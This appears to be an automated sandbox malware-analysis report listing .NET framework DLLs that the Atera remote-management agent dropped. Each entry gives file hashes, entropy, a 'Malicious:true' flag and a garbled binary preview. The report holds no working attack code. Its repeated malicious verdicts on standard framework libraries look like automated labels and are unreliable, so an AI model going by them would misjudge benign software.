                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................C.....@..................................(..O....@.. ...............((...`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......\...#Strings....`.......#US.d.......#GUID...t.......#Blob......................3..................................................+.....+...^.....K.....r.................q.....'.....@.................[.....D...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.MemoryMappedFiles.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.909083241813673
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:/vk7hWmCWKpNyb8E9VF6IYijSJIVxug1fV:/s7/GtEpYi60HV
                                                                                                                                                                                                                                                                                              MD5:99D608EA299DB1E5E927AF7AD6F0D364
                                                                                                                                                                                                                                                                                              SHA1:E2625E44AEC5D3D2C53826E2B31A64AA54DF4C46
                                                                                                                                                                                                                                                                                              SHA-256:9711D1D2173CA18175118B8BBBC656BE11E18702EAC0047F6195889C60032BDF
                                                                                                                                                                                                                                                                                              SHA-512:80B8FC43E2F41649F19DFE954F2DD3FBA6CAFCE72AAAB4F0832017D672BCC93EA6E7187BD23056C256DEFF3150315789140B68336752042E34969ABC4F0EB70F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...............................:....@.................................h)..O....@..0...............((...`......0(............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................)......H.......P ..`....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....8.......#US.<.......#GUID...L.......#Blob......................3................................................ .C.....C...w.0...c.............................@.....Y.................t.....]...................*.....*.....*...).*...1.*...9.*...A.*...I.*...Q.*...Y.*...a.*...i.*...q.*.......................#.....+.....3.....;.....C.8...K.X...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8725581182244815
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:pUiW2xf+C/WCUW5wP5Nyby2sE9jBF6IYiYF85S35IVnxGUHFLZiDSj+2m:fGMWCUWiBNyb8E9VF6IYijSJIVxR5q2m
                                                                                                                                                                                                                                                                                              MD5:827CC9E1385DEE08EB88BA4F82A8D037
                                                                                                                                                                                                                                                                                              SHA1:1F4FD3E05F15B1CEF11222EF9FB0E7278D7FF0D8
                                                                                                                                                                                                                                                                                              SHA-256:EE7208B11C25F2244F73C4C7FE84634E283CABFA3BF3F8AA8231FEAB8806B32D
                                                                                                                                                                                                                                                                                              SHA-512:D42CA3E72BF359CB8120051414D554A89A8D8E6E8D2463CE3684CFB32977F5437EB5FEDDA5A08080130DD24170BE8CE93F9CE4ACB9307D878B2C2C1CECCB37DD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ..............................Kp....@.................................@)..O....@..................((...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................t)......H.......P ..8....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US. .......#GUID...0.......#Blob......................3..................................................].....]...T.J...}.....h.$.....$.....$...g.$.....$...6.$.....$.....$...Q.....:.$.................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;.....C.,...K.L...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.852073911727644
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:1BhwI7WSQWEQNyb8E9VF6IYijSJIVxCtgRyl:1DwIBSoEpYi60a
                                                                                                                                                                                                                                                                                              MD5:96CC4DB802A18A19C634362EA07BF0CA
                                                                                                                                                                                                                                                                                              SHA1:5E73A7D50926A20ADF21C5A681CFD88E6782E36A
                                                                                                                                                                                                                                                                                              SHA-256:2C36B9CE0C5B3D2BD1437FA57DFCFE7E8C13BBA014BBAFD6895736A6654704C3
                                                                                                                                                                                                                                                                                              SHA-512:442D514BADBDFD84F67A1B5CC5C653F6EBF49A951657FED8C7BDFBD4D453D82AE9A3E3845BF3BEAA6B4380FA7E45E5531E6594BC3673788199C79FC7119EE884
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................V....@.................................l(..O....@..P...............((...`......4'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..d....................&......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................f.....:.....2.....N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.870125259512271
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:FyvPRW4lWvKNyb8E9VF6IYijSJIVxnKq3u:s39oKEpYi60Fu
                                                                                                                                                                                                                                                                                              MD5:E86EF319DCB1A0C3A1C980B8179C28DF
                                                                                                                                                                                                                                                                                              SHA1:B7B384331A1F5A4ED7A1EB64B93A50D3D99543BA
                                                                                                                                                                                                                                                                                              SHA-256:CDF9D59E281EAD07334BAEDF6F929AA27AB968B7121B53EEE2406EADEFE901C3
                                                                                                                                                                                                                                                                                              SHA-512:A76AB5FB097CDCF658F4645AF58F4B9F4CE9B5B14683A7B2463598692D7835D969A0AB7C387CC96D9EEABE095E4223B40FA1EE8BD840F83144AC0B5818BBBF5A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................'.....@..................................)..O....@..................((...`......l(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................f.....:...........N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.&...K.F...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Expressions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.821263452437729
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:r6RW6eWX8Nyb8E9VF6IYijSJIVxiAcn/A:r67XcEpYi601c/A
                                                                                                                                                                                                                                                                                              MD5:5DE19C03111BAC441546E09C0986FFB8
                                                                                                                                                                                                                                                                                              SHA1:73A84A9DBB2C687D7B98675391F17919BE4A0E2D
                                                                                                                                                                                                                                                                                              SHA-256:E8B6180145EB52C8357A15E71EDC4F4A3CB103E2C9E3CA39DEF0837C25486FF4
                                                                                                                                                                                                                                                                                              SHA-512:8A3B551E5D14A05A4DA4D244FA8BF285C5FBEC7B5D613EC5B8AB73F4EF90D7F6AC4DFBF1AF206D8C4FACFA115AA03531660C8E39535315F3B680F72F7D34DCB9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............-... ...@....... ...............................]....@..................................-..O....@..................((...`......P,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................+......................................BSJB............v4.0.30319......l.......#~..\.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3......................................5.........c.............z...............(.....E.....................................Q.........../...........b.....b.....b...).b...1.b...9.b...A.b...I.b...Q.b...Y.b...a.b...i.b...q.b.......................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.853696719137859
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:cSUP9W70WxhNyb8E9VF6IYijSJIVxu17pF:5Ue/lEpYi600FF
                                                                                                                                                                                                                                                                                              MD5:18E7320ADED59C532DD1093BB36A47E3
                                                                                                                                                                                                                                                                                              SHA1:321C5DEEBE109D276BC9BA37FC0427AF1BEAE560
                                                                                                                                                                                                                                                                                              SHA-256:83415D3468C938305AAA415D4CFAB000A256942414F04C461416E2C160BCDB6A
                                                                                                                                                                                                                                                                                              SHA-512:18519422D60ECA9255CDD896010A2698C6055FB19F82E26CE678D08A5A00B2CA86B0438B8EF175825B7B27948A41C28D6157AEBE366341EC13ED6B8569589866
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ..............................l.....@..................................(..O....@..................((...`.......'............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...x...#Strings............#US.........#GUID...........#Blob......................3..................................................&.....&...p.....F.............................9.....R.................m.....V...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.847671491882663
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:m8yg07W0/WtTNyb8E9VF6IYijSJIVx/oOGL:mBHEPEpYi60AzL
                                                                                                                                                                                                                                                                                              MD5:4631C3F56A7B9031F7543E6814C16B8D
                                                                                                                                                                                                                                                                                              SHA1:3C5779DB0C60BE02444DD8747DD3B4A2CE37A1E3
                                                                                                                                                                                                                                                                                              SHA-256:D3AA1A71FA76EA5DDB353E1CC5180779DB3226122552CF5A621A2F72142D539D
                                                                                                                                                                                                                                                                                              SHA-512:82B24C7F8E2A876F839C0591E5FCA75472E7EBDDC1B354495C3F7CDFC8757F10C9DA7DE08BECA4A83570665C47281AC7700345EC0FDE03D0B90188BE869FC169
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ..............................W.....@..................................(..O....@..................((...`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...d...#Strings............#US.........#GUID...........#Blob......................3.................................................."....."...m.....B.............................6.....O.................j.....S.......(...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.817049710176357
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:we1WmRWgFNyb8E9VF6IYijSJIVxakgDjo:wejjBEpYi603l
                                                                                                                                                                                                                                                                                              MD5:2CAF5C21FCBF0230D9483F1FCA73E172
                                                                                                                                                                                                                                                                                              SHA1:F764EFFA55A81B03177BCE950034C683E45E086D
                                                                                                                                                                                                                                                                                              SHA-256:F3B140DFBF9255AC57327672D3EF85DA904B79C50D518EE51306C6A4CCDB7DCB
                                                                                                                                                                                                                                                                                              SHA-512:A09B873E6EBB483DE70D7AEA322B3F9EA6190945FDA674D8BE7CBC33DCF09DE27507F7A336CD346E026C68B61DB37C8C8C5CAA6276B9946936C1F5C6863A7FEE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ..............................2.....@.................................p(..O....@..................((...`......8'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..h....................&......................................BSJB............v4.0.30319......l.......#~.. ...0...#Strings....P.......#US.T.......#GUID...d.......#Blob......................3............................................................f...........z.................y...../.....H.................c.....L.......,...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.(...K.H...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Memory.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):142376
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.160416111190502
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:mUGrszKKLBFa9DvrJGeesIf3afNs2AldfIlqg:RBFd3/aFs29
                                                                                                                                                                                                                                                                                              MD5:401E4D347BD255E0BB8DDE6FB0B9C1B4
                                                                                                                                                                                                                                                                                              SHA1:FB06977AB97D10368872DBC07EDF0EF5F7FAC2E5
                                                                                                                                                                                                                                                                                              SHA-256:EEBF2B7039D66E279C867C4FA6A52992C03D4471B02CBB5482B25330CC9D0AC5
                                                                                                                                                                                                                                                                                              SHA-512:C8AFF36074FA5A074322B2631D8966101EFB8BA8CC9E90751985CC7822F5403E7B3F2516FB95FCF3DFB2B6575C5E856CDC77AD2D3CE413399C5A650EA245212F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`......Iu....@.................................X...O.... ..0...............((...@...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H........,................................................................('...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....((...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o)....{....(a...*..(....zN........o*...s+...*.(....z.s,...*..(....zF(U....(O...s-...*.(....z.(V...s-...*.(....z.s....*.(....z.s/...*..(....zN........o*...s0...*.(....zrr...p(\....c.K...(O...s1...*.(....zBr...p(Y...s1...*.(....z.s2...*.(....z.(X...s3...*.(!...z.(_...s3...*.(#...z

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Http.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):192552
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1145313432038435
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:zeruQlNGOhYq0AQcTvankc+8lbKta4FUPAT8xpRI454I/Kv6RpZ8dwPSgSbG:OW60VcTvakcXcApOW
                                                                                                                                                                                                                                                                                              MD5:D3E5C0965EAA22ABF7983475E0D1BDD6
                                                                                                                                                                                                                                                                                              SHA1:3A38A616388260BA9063FF0A8DEC1F5F79C35167
                                                                                                                                                                                                                                                                                              SHA-256:317C9D83B5CF920086FAAC9F3958ADE2DA011CC3BE3C2D26AC29D98A471A256E
                                                                                                                                                                                                                                                                                              SHA-512:447AB3090F482799F87FEDD2903512C8DE3D50AA81F7DB201883789D35C73C3DD67DBACBAD3F190D6EEA46F81FCEF15233484E8BC16AF768201D3AAE50AE2B25
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.................. ........... ....................... ......aC....@.....................................O.......h...............((........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........$..H...........$....,...........................................0..,........ ....1.r...ps0...z.............(.....s1...*.0..l........J.2..J.o2...2.r...ps0...z..Jo3....%36.o2....JY.2*..J.Xo3.....J.Xo3...(...... ........J.XT.*...J...XT.o3...*..o2....Y./..*..o3....%3 ...Xo3......Xo3...(.... .......*.*..0..=..........J...XT..%....J...XT.~..... ...._.c.....J...XT.~......._..*....0............02...91...A2...F1...a2...f1. ....*..91...F1...aY+...AY..X+...0Y...02...91...A2...F

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NameResolution.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.8352214136086555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:06ZWYLWBwNyb8E9VF6IYijSJIVxNNLD3Nqi:06l4IEpYi605qi
                                                                                                                                                                                                                                                                                              MD5:FDE1F464939CB2FA8F1FEC631AF3CF0E
                                                                                                                                                                                                                                                                                              SHA1:B62ADCBE2A59A559F9610FFDF3DEA3B434EB17D8
                                                                                                                                                                                                                                                                                              SHA-256:694FC622E3460D03502B2A8BF8BD2FFCC5358117297DDAB006D6ADE71CE07332
                                                                                                                                                                                                                                                                                              SHA-512:EC2F1E08CC1EF0B78573766DC0C7F454D00A3BCCCF96EE972FB6A99EA1DA7AACCC82187F4D5AB6F1E6A23BFFBC8403E9D7D0EBA30535DD9D54350E878AA94E3B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...................................@.................................T(..O....@.. ...............((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......0...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NetworkInformation.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.792745535380218
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:n1W1WMQWkMNyb8E9VF6IYijSJIVxuHjg4:o1yMEpYi60un
                                                                                                                                                                                                                                                                                              MD5:4B018741B464AED29724E31FE593A2F0
                                                                                                                                                                                                                                                                                              SHA1:435143DFD60DA9C7A3839B0AF6C0EEC9E6D72531
                                                                                                                                                                                                                                                                                              SHA-256:27A83893C71285085B9334678212FEFCE779CD3E877F8232B90FF61A2AD2E8E1
                                                                                                                                                                                                                                                                                              SHA-512:C542ECF9A11CECBA69FEFA791C7DCD18E6D0436E6D9F0C164FF50A4D2564A317890EC23C2B588AD6B8441551B6BF046D2D714CF484D71978DBDA75034861BDF2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............,... ...@....... ..............................z.....@..................................,..O....@..@...............((...`......p+............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....t.......#US.x.......#GUID...........#Blob......................3................................!...............E.................%.................'...........e.....~...........................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.:...K.Z...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Ping.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.832665685039471
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:JQ/rx72WSKW5TPZNyby2sE9jBF6IYiYF85S35IVnxGUHFA/P6iMYRh9:6dSWSKW1BNyb8E9VF6IYijSJIVxsbMq/
                                                                                                                                                                                                                                                                                              MD5:51835E547CFCAEDCD46D41A916007337
                                                                                                                                                                                                                                                                                              SHA1:027AF2DA308C20BFECFE01D6925F15677658B9ED
                                                                                                                                                                                                                                                                                              SHA-256:E0D868F38EA149A2256491A2067E7C1EB21A9CBE68FD018A7EAA2D65E8C6F5B4
                                                                                                                                                                                                                                                                                              SHA-512:6FA395D0B6B230B96A0263BA005A5E6518CA96E6785BBC964D75108CD9C3E58670B9CEEA2BC11188F1FD4CDA1C2A03A63F3E9C12A84AAB233BDEDBE0EF8149F0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................4....@..................................(..O....@..................((...`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...L...#Strings....l.......#US.p.......#GUID...........#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.,...K.L...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.7476634745054485
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:XJEYA2WkIWcqNyb8E9VF6IYijSJIVx1IZ22zG:XyYA8CqEpYi60+Zu
                                                                                                                                                                                                                                                                                              MD5:2B512D2A20AA68D1F8AA686BF246F15B
                                                                                                                                                                                                                                                                                              SHA1:D37F581A2DD9651E3A9F0D2B00D1275FE43F81EB
                                                                                                                                                                                                                                                                                              SHA-256:D9B9A099BCB2D685BF4CAF9A04FA022D08AABE3CBBD04912FB9FFF73CCD162F6
                                                                                                                                                                                                                                                                                              SHA-512:4C999BD5F20691AB4AB77015E34F0822076FB549A4B41495496AD8505FE6BC3A732DC1AAFDDC5FB6E576AA76AAD673D674A21C421D1FBB8791EB3D2CC4CFCD23
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
